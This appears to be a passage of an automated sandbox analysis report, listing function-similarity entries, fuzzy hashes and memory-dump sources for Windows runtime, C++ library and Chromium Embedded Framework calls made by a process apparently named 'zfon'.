                                                                                                                                                                            • API ID: std::locale::_$Setgloballocalesetlocale$InitLocimpLocimp::_New__lock_locales
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2905786255-0
                                                                                                                                                                            • Opcode ID: 7533d42a88b30cf4c54e14bc2d80b216ec68bb4ad39f55c3e1146a9e5df12688
                                                                                                                                                                            • Instruction ID: 517bca6c3a815dbd489814297e5c5f3e68d639d6c8c159ceafbaa23bd9df405b
                                                                                                                                                                            • Opcode Fuzzy Hash: 7533d42a88b30cf4c54e14bc2d80b216ec68bb4ad39f55c3e1146a9e5df12688
                                                                                                                                                                            • Instruction Fuzzy Hash: 1931BFBAA14F0183EB149F6AD59417A63A1FB48FD0F049130DA1E677A1DF3CE461C740
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 09fd9b7f2d28d969b82d29a789759c274fd24cd7d2748fe4802a739e8160af33
                                                                                                                                                                            • Instruction ID: e90b7727abacc7bafd8ef1e1b0195097ffb526940eb0803fe335d650ccbba5db
                                                                                                                                                                            • Opcode Fuzzy Hash: 09fd9b7f2d28d969b82d29a789759c274fd24cd7d2748fe4802a739e8160af33
                                                                                                                                                                            • Instruction Fuzzy Hash: F121D372A0C64751FE34AB38F464379B766EB857B0F940330D6AE02AE6DF2CD4908620
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B36FF4
                                                                                                                                                                            • ___lc_collate_cp_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B36FFE
                                                                                                                                                                              • Part of subcall function 00007FFBC1B39320: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFBC1B3705B), ref: 00007FFBC1B39363
                                                                                                                                                                              • Part of subcall function 00007FFBC1B39320: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFBC1B3705B), ref: 00007FFBC1B39388
                                                                                                                                                                              • Part of subcall function 00007FFBC1B39320: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFBC1B3705B), ref: 00007FFBC1B393C8
                                                                                                                                                                            • memcmp.VCRUNTIME140 ref: 00007FFBC1B37021
                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B3705F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __strncnt$Info___lc_collate_cp_func___lc_locale_name_func_errnomemcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3421985146-0
                                                                                                                                                                            • Opcode ID: 02edfa4313c4fb3aabff1bebf8c1357e348f0fccc221029525811e02a34b2029
                                                                                                                                                                            • Instruction ID: 14aaa7279f34bc76ebecd66e39392eb028217b6a8bc0ef47977cb56280372913
                                                                                                                                                                            • Opcode Fuzzy Hash: 02edfa4313c4fb3aabff1bebf8c1357e348f0fccc221029525811e02a34b2029
                                                                                                                                                                            • Instruction Fuzzy Hash: C52162B9A08B8286EB108F36D44016AF7A4FB88FD0B945135DA4D67795DF3CE451CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB6623
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB6633
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB6643
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB6650
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: b95c016416db0c7f8fb3c8f7d6a9f229c93ff0f0e18789e355680685c849e604
                                                                                                                                                                            • Instruction ID: 2a82e96fd0a46c9b76091276a4d3f9fb1f44c93370dce5383feb65d4f022a4ca
                                                                                                                                                                            • Opcode Fuzzy Hash: b95c016416db0c7f8fb3c8f7d6a9f229c93ff0f0e18789e355680685c849e604
                                                                                                                                                                            • Instruction Fuzzy Hash: 3611C362E0CA4791FE38A738E458339A772EB857B4F941730D6AE06AD5DF2CD0904A20
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 7d4bbb70432d916687639b929200fd9207a111d92069894b91313117c6e492f1
                                                                                                                                                                            • Instruction ID: 5ef1ec1061765a4a8667d7efd4d96aa3b21d68270dc540b45d20308a291dba46
                                                                                                                                                                            • Opcode Fuzzy Hash: 7d4bbb70432d916687639b929200fd9207a111d92069894b91313117c6e492f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 8821A436A0CB8285EB71AB25B440269F7A1FB88BC4F894134EACE4775AEF3CD5418750
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB34D0
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB34E0
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB34F0
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB34FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 92a2097852ec47728736fe8942dbd70fe199a2d08fb94bba399e5a4b162ee94b
                                                                                                                                                                            • Instruction ID: bcab6fea16b7fc257279bb31a4dc26d1b3618d0a4321f788b05594d5812c57c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 92a2097852ec47728736fe8942dbd70fe199a2d08fb94bba399e5a4b162ee94b
                                                                                                                                                                            • Instruction Fuzzy Hash: 98119423A4864781EF28AB79E508338E272EB49BA4FD40531C66E033D5DF7DD4888225
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                                                                                            • Instruction ID: 0060cbb6510ff74f4bfeef4a5643e00aad4fbf3eea9d902190ff5166e814e81d
                                                                                                                                                                            • Opcode Fuzzy Hash: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                                                                                            • Instruction Fuzzy Hash: F121C866A08B8197E754CB3AE6416A9B360F759798F00A125EF9E53A12DF38F1E4C700
                                                                                                                                                                            APIs
                                                                                                                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFDB4F7
                                                                                                                                                                              • Part of subcall function 00007FF79CFD98A0: memmove.VCRUNTIME140 ref: 00007FF79CFD9939
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFDB52C
                                                                                                                                                                            • SetLastError.KERNEL32 ref: 00007FF79CFDB555
                                                                                                                                                                            • ?_Ios_base_dtor@ios_base@std@@CAXPEAV12@@Z.MSVCP140 ref: 00007FF79CFDB58A
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD927A
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD928F
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD929F
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD92AF
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD92BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$V01@$??6?$basic_ostream@D@std@@@std@@ErrorIos_base_dtor@ios_base@std@@LastU?$char_traits@V01@@V12@@cef_string_map_allocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1591153422-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3203701943-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB2876
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB2886
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB2896
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB28A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B52F3F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B52F82
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                            • API String ID: 3668304517-2799312399
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B533EF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B53432
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                            • API String ID: 3668304517-2799312399
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@
                                                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                                                            • API String ID: 1004598685-3788999226
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B5D5F4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: %.0Lf$0123456789-
                                                                                                                                                                            • API String ID: 3668304517-3094241602
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 451473138-1018135373
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturnswprintf_s
                                                                                                                                                                            • String ID: %.0Lf
                                                                                                                                                                            • API String ID: 296878162-1402515088
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CreateFrameInfo
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 2697087660-1018135373
                                                                                                                                                                            • Opcode ID: 97157617618e05fe8c8104398669bc63cc419c1e3435ae2751fdc288269851fb
                                                                                                                                                                            • Instruction ID: 639b14001e193855b24d7b5d6fff64c08ed5e5d15e54bfeab5545828b5bb3d5a
                                                                                                                                                                            • Opcode Fuzzy Hash: 97157617618e05fe8c8104398669bc63cc419c1e3435ae2751fdc288269851fb
                                                                                                                                                                            • Instruction Fuzzy Hash: CD5129BB61864286D720AF25E44436F77A4FB89B90F262234EB8D57B55CF3CE461CB00
                                                                                                                                                                            APIs
